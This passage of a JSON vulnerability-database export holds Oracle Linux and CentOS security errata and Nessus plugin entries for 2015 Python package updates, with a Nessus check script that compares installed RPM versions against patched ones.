{\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:12", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "description": "[2.6.6-64.0.1]\n- Add Oracle Linux distribution in platform.py [orabug 21288328] (Keshav Sharma)\n[2.6.6-64]\n- Enable use of deepcopy() with instance methods\nResolves: rhbz#1223037\n[2.6.6-63]\n- Since -libs now provide python-ordered dict, added ordereddict\n dist-info to site-packages\nResolves: rhbz#1199997\n[2.6.6-62]\n- Fix CVE-2014-7185/4650/1912 CVE-2013-1752\nResolves: rhbz#1206572\n[2.6.6-61]\n- Fix logging module error when multiprocessing module is not initialized\nResolves: rhbz#1204966\n[2.6.6-60]\n- Add provides for python-ordereddict\nResolves: rhbz#1199997\n[2.6.6-59]\n- Let ConfigParse handle options without values\n- Add check phase to specfile, fix and skip relevant failing tests\nResolves: rhbz#1031709\n[2.6.6-58]\n- Make Popen.communicate catch EINTR error\nResolves: rhbz#1073165\n[2.6.6-57]\n- Add choices for sort option of cProfile for better output\nResolves: rhbz#1160640\n[2.6.6-56]\n- Make multiprocessing ignore EINTR\nResolves: rhbz#1180864\n[2.6.6-55]\n- Fix iteration over files with very long lines\nResolves: rhbz#794632\n[2.6.6-54]\n- Fix subprocess.Popen.communicate() being broken by SIGCHLD handler.\nResolves: rhbz#1065537\n- Rebuild against latest valgrind-devel.\nResolves: rhbz#1142170\n[2.6.6-53]\n- Bump release up to ensure proper upgrade path.\nRelated: rhbz#958256", "edition": 4, "modified": "2015-07-28T00:00:00", "published": "2015-07-28T00:00:00", "id": "ELSA-2015-1330", "href": "http://linux.oracle.com/errata/ELSA-2015-1330.html", "title": "python security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "python27\n[1.1-17]\n- Require python-pip and python-wheel (note: in rh-python34\n this is not necessary, because 'python' depends on these).\npython27-python\n[2.7.8-3]\n- Add httplib fix for CVE-2013-1752\nResolves: rhbz#1187779\n[2.7.8-2]\n- Fix %check\nunset DISPLAY\n setion not failing properly on failed test\n- Fixed CVE-2013-1752, CVE-2013-1753\nResolves: rhbz#1187779\n[2.7.8-1]\n- Update to 2.7.8.\nResolves: rhbz#1167912\n- Make python-devel depend on scl-utils-build.\nResolves: rhbz#1170993\npython27-python-pip\n - New Package added\npython27-python-setuptools\n[0.9.8-3]\n- Enhance patch restoring proxy support in SSL connections\nResolves: rhbz#1222507\npython27-python-simplejson\n[3.2.0-2]\n- Fix CVE-2014-461, add boundary checks\nResolves: rhbz#1222534\npython27-python-wheel\n - New Package added ", "edition": 4, "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-1064", "href": "http://linux.oracle.com/errata/ELSA-2015-1064.html", "title": "python27 security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "[2.7.5-34.0.1]\n- Add Oracle Linux distribution in platform.py [orabug 20812544]\n[2.7.5-34]\n- Revert fix for rhbz#1117751 as it leads to regressions\nResolves: rhbz#1117751\n[2.7.5-33]\n- Only restore SIG_PIPE when Popen called with restore_sigpipe\nResolves: rhbz#1117751\n[2.7.5-32]\n- Backport SSLSocket.version function\n- Temporary disable test_gdb on ppc64le rhbz#1260558\nResolves: rhbz#1259421\n[2.7.5-31]\n- Update load_cert_chain function to accept None keyfile\nResolves: rhbz#1250611\n[2.7.5-30]\n- Change Patch224 according to latest update in PEP493\nResolves:rhbz#1219108\n[2.7.5-29]\n- Popen shouldn't ignore SIG_PIPE\nResolves: rhbz#1117751\n[2.7.5-28]\n- Exclude python subprocess temp files from cleaning\nResolves: rhbz#1058482\n[2.7.5-27]\n- Add list for cprofile sort option\nResolves:rhbz#1237107\n[2.7.5-26]\n- Add switch to toggle cert verification on or off globally\nResolves:rhbz#1219108\n[2.7.5-25]\n- PEP476 enable cert verifications by default\nResolves:rhbz#1219110\n[2.7.5-24]\n- Massive backport of ssl module from python3 aka PEP466\nResolves: rhbz#1111461\n[2.7.5-23]\n- Fixed CVE-2013-1753, CVE-2013-1752, CVE-2014-4616, CVE-2014-4650, CVE-2014-7185\nResolves: rhbz#1206574\n[2.7.5-22]\n- Fix importing readline producing erroneous output\nResolves: rhbz#1189301\n[2.7.5-21]\n- Add missing import in bdist_rpm\nResolves: rhbz#1177613\n[2.7.5-20]\n- Avoid double close of subprocess pipes\nResolves: rhbz#1103452\n[2.7.5-19]\n- make multiprocessing ignore EINTR\nResolves: rhbz#1181624", "edition": 5, "modified": "2015-11-23T00:00:00", "published": "2015-11-23T00:00:00", "id": "ELSA-2015-2101", "href": "http://linux.oracle.com/errata/ELSA-2015-2101.html", "title": "python security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:03", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "description": "**CentOS Errata and Security Advisory** CESA-2015:1330\n\n\nPython is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes, users\nare directed to the following article on the Red Hat Customer Portal:\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-July/008106.html\n\n**Affected packages:**\npython\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1330.html", "edition": 3, "modified": "2015-07-26T14:11:19", "published": "2015-07-26T14:11:19", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2015-July/008106.html", "id": "CESA-2015:1330", "title": "python, tkinter security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "description": "**CentOS Errata and Security Advisory** CESA-2015:2101\n\n\nPython is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-November/008760.html\n\n**Affected packages:**\npython\npython-debug\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-2101.html", "edition": 4, "modified": "2015-11-30T19:48:49", "published": "2015-11-30T19:48:49", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2015-November/008760.html", "id": "CESA-2015:2101", "title": "python, tkinter security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-03-18T02:23:05", "description": "Updated python packages that fix multiple security issues, several\nbugs and add one enhancement are now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes,\nusers are directed to the following article on the Red Hat Customer\nPortal :\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-07-23T00:00:00", "title": "RHEL 6 : python (RHSA-2015:1330)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-07-23T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-tools", "p-cpe:/a:redhat:enterprise_linux:python", "p-cpe:/a:redhat:enterprise_linux:python-devel", "p-cpe:/a:redhat:enterprise_linux:tkinter", "p-cpe:/a:redhat:enterprise_linux:python-debuginfo", "p-cpe:/a:redhat:enterprise_linux:python-test", "p-cpe:/a:redhat:enterprise_linux:python-libs", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-1330.NASL", "href": "https://www.tenable.com/plugins/nessus/84938", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1330. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84938);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 65379, 68147, 70089);\n script_xref(name:\"RHSA\", value:\"2015:1330\");\n\n script_name(english:\"RHEL 6 : python (RHSA-2015:1330)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs and add one enhancement are now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes,\nusers are directed to the following article on the Red Hat Customer\nPortal :\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1495363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4650\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1330\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"python-debuginfo-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"python-devel-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"python-libs-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-test-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-test-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-test-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-tools-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-tools-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-tools-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tkinter-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"tkinter-2.6.6-64.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tkinter-2.6.6-64.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debuginfo / python-devel / python-libs / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:11:50", "description": "From Red Hat Security Advisory 2015:1330 :\n\nUpdated python packages that fix multiple security issues, several\nbugs and add one enhancement are now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes,\nusers are directed to the following article on the Red Hat Customer\nPortal :\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-07-30T00:00:00", "title": "Oracle Linux 6 : python (ELSA-2015-1330)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-07-30T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:tkinter", "p-cpe:/a:oracle:linux:python", "p-cpe:/a:oracle:linux:python-libs", "p-cpe:/a:oracle:linux:python-test", "p-cpe:/a:oracle:linux:python-tools", "p-cpe:/a:oracle:linux:python-devel"], "id": "ORACLELINUX_ELSA-2015-1330.NASL", "href": "https://www.tenable.com/plugins/nessus/85099", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1330 and \n# Oracle Linux Security Advisory ELSA-2015-1330 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85099);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 65379, 68147, 70089);\n script_xref(name:\"RHSA\", value:\"2015:1330\");\n\n script_name(english:\"Oracle Linux 6 : python (ELSA-2015-1330)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1330 :\n\nUpdated python packages that fix multiple security issues, several\nbugs and add one enhancement are now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes,\nusers are directed to the following article on the Red Hat Customer\nPortal :\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005228.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 